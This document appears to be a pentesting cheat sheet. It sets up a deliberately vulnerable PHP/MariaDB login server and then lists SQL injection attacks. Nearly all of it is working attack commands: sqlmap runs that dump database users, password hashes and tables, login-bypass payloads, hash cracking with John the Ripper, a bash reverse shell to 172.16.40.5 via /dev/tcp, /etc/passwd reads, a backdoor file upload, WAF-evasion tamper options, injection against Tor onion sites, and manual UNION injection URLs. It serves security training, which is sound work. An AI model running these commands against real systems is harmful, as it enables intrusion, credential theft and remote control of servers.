Deploy a vulnerable web services server

Install apache2
sudo apt install apache2
sudo chown www-data:www-data /var/www/html/ -R

Install php
sudo apt install php-bcmath php-curl php-imagick php-gd php-mbstring php-xml php-zip sudo apt
install php php-fpm
sudo apt install php-mysql php-gd
sudo apt install php libapache2-mod-php sudo systemctl restart apache2

Install MariaDB
sudo apt install mariadb-server
sudo mysql -h localhost -u root -p
create database dbsistema character set utf8; create user server@'localhost';
set password for 'server'@'localhost' = PASSWORD('juakers789'); grant all on dbsistema.* to
'server'@'localhost';
mysql -u server -p dbsistema < dbsistema.sql
flush privileges;
https://emn178.github.io/online-tools/sha256.html
UPDATE usuario SET
clave='8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918' WHERE
idusuario=1;

Requirement
## Kali Linux: ##
1 - Firefox
2 - Burp Suite Comunnity
## Plugins Firefox: ##
https://addons.mozilla.org/es/firefox/addon/foxyproxy-standard/
https://addons.mozilla.org/es/firefox/addon/hacktools/
https://addons.mozilla.org/es/firefox/addon/wappalyzer/
https://addons.mozilla.org/es/firefox/addon/http-header-live/
https://addons.mozilla.org/es/firefox/addon/retire-js/
SQL injection
Fuzzing SQLi Login Bypass:
https://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/master/Intruder/exploit/
Auth_Bypass.txt
User: ' or 1=1 limit 1 -- -+ Pass: ' or 1=1 limit 1 -- -+

Perform a SQLi POST injection with sqlmap

We copy the HTTP/S request of the vulnerable login with Burp Suite
sqlmap -r sql.txt --random-agent --dbs
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method
POST -- data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --dbs
List the affected database in the application.
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method
POST -- data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --current-db
List the user in the SQL
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method
POST -- data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --users
List user passwords in MySQL
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method
POST -- data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --password
List privileges with the server user in MySQL
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method
POST -- data="logina=sadsadasadsa&clavea=asdsada" --privileges
List the dbsystem database tables
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method
POST -- data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema --tables
List columns of the user table of the dbsistema database
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method
POST -- data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema -T usuario –columns

Dump the records of the columns charge, email, login, key of the user table of the dbsistema database
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verifica --method
POST -- data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema -T usuario -C
cargo,email,login,clave –dump
Found 2 HASH en raw-SHA256:
8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
c5ff177a86e82441f93e3772da700d5f6838157fa1bfdc0bb689d7f7e55e7aba

Decrypt HASH MD5 Online

link: https://crackstation.net/

Password Cracking Offline

John The Ripper
john --format=raw-sha256 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Formatos de passwords en John The Ripper:
https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
https://raw.githubusercontent.com/Shiva108/CTF-notes/master/Notes%20VA/
HashFormats_JackTheRipper.txt
Advanced SQLMAP
Identify the database directly affected by the SQLi exploitation.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --
current-db
Identify the user who connects to the instance directly affected by the SQLi exploitation.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --
current-user
List the users in the database manager.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --
users
List user privileges on the database manager.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --
privileges
Obtain a reverse shell (We must have write permission).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --os-
shell
Execute operating system commands from SQL.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --os-
cmd 'bash -c 'exec bash -i &>/dev/tcp/172.16.40.5/443 <&1''
Read OS files (We must have Read permission).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --file-
read='/etc/passwd'
cat /root/.local/share/sqlmap/output/192.168.100.6/files/_etc_passwd
Uploading files on the operating system vulnerable to SQLi. (We must have write
permission).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --file-
write='/root/backdor.php' --file-dest='/var/www/html/xvwa/config1.php'
Injection with prefix identification.
sqlmap -u 'http://104.248.172.152:32587/case6.php?col=id' --dbms="mysql" --level=3 --risk=2 --
code=200 --prefix='`' --no-cast
sqlmap -u 'http://104.248.172.152:32587/case6.php?col=id' --dbms="mysql" --level=3 --risk=2 --
code=200 --prefix='`' --no-cast --time-sec=2 -D testdb -T flag6 -C Content --dump
Injection with union identification
sqlmap -u 'http://167.172.52.160:32714/case7.php?id=1' --level=3 --risk=3 --no-cast --union-
char='1' --dbms="mysql" --random-agent --technique=U –union-cols=1-20

sqlmap -u 'http://167.172.52.160:32714/case7.php?id=1' --level=3 --risk=3 --no-cast --union-

char='1' --dbms="mysql" --random-agent --technique=U --union-cols=1-20 -D testdb -T flag7
-C Content –dump
Anti-CSRF Token Bypass Injection
sqlmap -u 'http://167.172.52.160:31918/case8.php' --
data="id=1&t0ken=uwDFtZygjfiRWmWzY0tc4IQV3a4P1q6G97E0xXS8uw" --csrf-token="t0ken"
--random-agent --skip-waf
sqlmap -u 'http://167.172.52.160:31918/case8.php' --
data="id=1&t0ken=uwDFtZygjfiRWmWzY0tc4IQV3a4P1q6G97E0xXS8uw" --csrf-token="t0ken"
--cookie="PHPSESSID=enos23dmkupup8hhfghm2hpgso" --random-agent -D testdb -T flag8 -C
Content --dump
Single Value Bypass Injection
sqlmap -u 'http://167.172.52.160:31918/case9.php?id=1&uid=1599283944' --randomize=uid --
batch -v 5 | grep URI
sqlmap -u 'http://167.172.52.160:31918/case9.php?id=1&uid=1599283944' --randomize=uid --
batch -v 5 --random-agent --dbs
Injection Bypass Filtering of characters '<', '>'
sqlmap -u '167.172.52.160:31918/case11.php?id=1' --tamper=between --level=3 --risk=3 --no-cast
--dbms=mysql –dbs

sqlmap 'http://178.128.42.126:30292/action.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64;

rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: */*' -H 'Accept-Language: en- US,en;q=0.5' -H 'Accept-
Encoding: gzip, deflate' -H 'Content-Type: application/json' -H 'Origin: http://178.128.42.126:30292' -H
'Connection: keep-alive' -H 'Referer: http://178.128.42.126:30292/shop.html' -H 'Cookie: sort=0a' --data-raw
'{"id":1}' –dbms="mysql" --level=3 --risk=2 --no-cast --tamper=between --time-sec=2 -D production -T
final_flag -C content --dump

WAF Evasion
View installed scripts ls /usr/share/sqlmap/tamper
sqlmap -u'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' --random- agent --
timeout=3 -v 1 --threads=10 --dbms=mysql --level=5 --risk=3 -v 3 --no-cast --dbs – tamper='htmlencode'

Search by columns
sqlmap -u 'https://www.tuwebsito.com/?search=aea' --random-agent --timeout=3 -v 1 --threads=10
--dbms=mysql --level=5 --risk=3 -v 3 --hex -C nombre –search

Extract data from columns by number of records

sqlmap -u 'https://www.tuwebsito.com/?search=aea' --level=2 --risk=1 --no-cast -p 'continente' --
string="KM" --dbms="Oracle" --time-sec=1 --tamper="between,charencode" --random-agent -D IDODB
-T ACT_VERIFICACION --pivot-column=PRE_NOMBRES -C PRE_NOMBRES_E --start=1 --
stop=10 --dump

Identify parameters through crawling

sqlmap -u http://testphp.vulnweb.com/ --crawl=10 --level=1 --risk=1 --answers="do you want to test this
URL=Y" --answers="Do you want to skip further tests involving it? =N" --threads 10 –batch
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --
cookie="PHPSESSID=enos23dmkupup8hhfghm2hpgso" --random-agent
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --dbms=mysql --
answers "already=N"
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --dbms=mysql --
answers="follow=Y"
Identify parameters of multiple endpoints (urls)

sqlmap -m urls.txt --batch --level=3 --risk=2 --dbms=mysql --answers "already=N"

sqlmap -m sql.txt --batch --level=3 --risk=2 --dbms=mysql --answers "already=N" --method POST --
data="id=1" --cookie="PHPSESSID=msk54snle4a8dfca774mhrih13" --dbs

Pentesting Target Onion InjectionSQLi

sudo apt install tor && sudo apt install proxychains
netstat -apn | grep "tor" / 127.0.0.1:9150
proxychains4 nmap -sT -PN -n -p-
2uw3iwonlklvl5bftdqwebg7n4v62yq3nrpbczry2flmpghpajc45xqd.onion
sqlmap -r web.txt --dbms='mysql' --random-agent --tor --check-tor --tor-port=9150 --tor- type=SOCKS5 --level
2 --risk 2 –dbs

SQL Manual
Specifically, it's trying to retrieve the version of the database and the name of the current database being used.
http://192.168.30.122:5432/post.php?post=-
1+UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+--

I's performing a UNION SELECT query. However, in this case, it's simply selecting the first ten numbers (1
through 10) as columns.
http://192.168.30.122:5432/post.php?post=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+--

Is s attempting to retrieve the current user of the database.

http://192.168.30.122:5432/post.php?post=- 1+UNION+SELECT+1,2,current_user(),4,5,6,7,8,9,10+--

is trying to enumerate tables in the current database by querying the information_schema.tables table. It's
selecting the name of the first table in the current database.
http://192.168.30.122:5432/post.php?post=- 1+UNION+SELECT+1,2,table_name,4,5,6,7,8,9,10%20from
%20information_schema.tables
%20where%20table_schema=database()%20limit%200,1

t's selecting the name of the fourth table in the current database. http://192.168.30.122:5432/post.php?
post=- 1+UNION+SELECT+1,2,table_name,4,5,6,7,8,9,10%20from
%20information_schema.tables
%20where%20table_schema=database()%20limit%203,1

This URL is trying to retrieve a concatenated list of all table names in the current database
http://192.168.30.122:5432/post.php?post=-
1+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8,9,10%20from
%20information_schema.tables%20where%20table_schema=database()

Is trying to retrieve a concatenated list of all column names in the table named "users".
http://192.168.30.122:5432/post.php?post=-
1+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8,9,10%20from
%20information_schema.columns%20where%20table_name=%27users%27

is trying to retrieve information about user privileges from the information_schema.user_privileges table.
http://192.168.30.122:5432/post.php?post=-1+UNION+ALL+SELECT+1,2,concat(grantee,%27--
%27,%20privilege_type,%27--%27,%20is_grantable),4,5,6,7,8,9,10%20FROM
%20information_schema.user_privileges#
Vulnerable Web Applications:
https://github.com/infosecAK/defenselessV1
https://github.com/s4n7h0/xvwa
https://github.com/anil-yelken/Vulnerable-Soap-Service
https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application
https://github.com/appsecco/dvna
https://github.com/snoopysecurity/dvws-node
https://github.com/appsecco/dvja
https://github.com/WebGoat/WebGoat
https://github.com/juice-shop/juice-shop
https://github.com/appelsiini/vulnerable-laravel-app
https://github.com/appsecco/dvcsharp-api
https://github.com/srini0x00/dvta
https://github.com/OWASP/DVSA
https://github.com/cider-security-research/cicd-goat
https://github.com/tinchoabbate/damn-vulnerable-defi/tree/v3.0.0
https://github.com/ine-labs/AzureGoat
https://github.com/ine-labs/AWSGoat